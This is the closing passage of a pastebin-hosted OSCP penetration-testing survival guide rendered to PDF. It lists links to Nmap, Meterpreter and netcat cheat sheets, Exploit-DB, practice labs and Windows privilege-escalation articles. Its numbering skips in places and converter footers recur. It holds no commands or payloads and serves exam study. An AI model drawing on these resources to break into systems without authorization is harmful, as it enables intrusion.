(http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf)
2649.
2650. - [*http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf*]
(http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf)
2651.
2652. - [*http://www.sans.org/security-resources/sec560/misc\_tools\_sheet\_v1.pdf*](http://www.sans.org/security-
resources/sec560/misc_tools_sheet_v1.pdf)
2653.
2654. - [*http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html*]
(http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html)
2655.
2656. - [*http://h.ackack.net/cheat-sheets/netcat*](http://h.ackack.net/cheat-sheets/netcat)
2657.
2658. Essentials
2659. ========================================================================================================
2660.
2661. - Exploit-db
2662. [*https://www.exploit-db.com/*](https://www.exploit-db.com/)
2663.
2668. [*https://www.vulnhub.com/*](https://www.vulnhub.com/)
2669.
2670. - Exploit Exercises
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2671. [*https://exploit-exercises.com/*](https://exploit-exercises.com/)
2672.
2673. - SecLists - collection of multiple types of lists used during
2694. [*http://www.fuzzysecurity.com/tutorials/16.html*](http://www.fuzzysecurity.com/tutorials/16.html)
2695.
2696. - accesschk.exe
2697. https://technet.microsoft.com/en-us/sysinternals/bb664922
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2698.
2699. - Windows Priv Escalation For Pen Testers
2700. https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
2701.
2702. - Elevating Privileges to Admin and Further
2703. https://hackmag.com/security/elevating-privileges-to-administrative-and-further/
2704.
2705. - Transfer files to windows machines
2706. https://blog.netspi.com/15-ways-to-download-a-file/
# OSCP-Survival-Guide
<pre>
_____ _____ _____ ______ _____ _ _ _____ _ _
| _ / ___/ __ \| ___ \ / ___| (_) | | | __ \ (_) | |
| | | \ `--.| / \/| |_/ / \ `--. _ _ _ ____ _____ ____ _| | | | \/_ _ _ __| | ___
| | | |`--. \ | | __/ `--. \ | | | '__\ \ / / \ \ / / _` | | | | __| | | | |/ _` |/ _ \
\ \_/ /\__/ / \__/\| | /\__/ / |_| | | \ V /| |\ V / (_| | | | |_\ \ |_| | | (_| | __/
\___/\____/ \____/\_| \____/ \__,_|_| \_/ |_| \_/ \__,_|_| \____/\__,_|_|\__,_|\___|
</pre>
create new paste / dealsnew! / syntax languages / archive / faq / tools / night mode / api / scraping api
privacy statement / cookies policy / terms of service / security disclosure / dmca / contact
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Dedicated Server Hosting by Steadfast
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD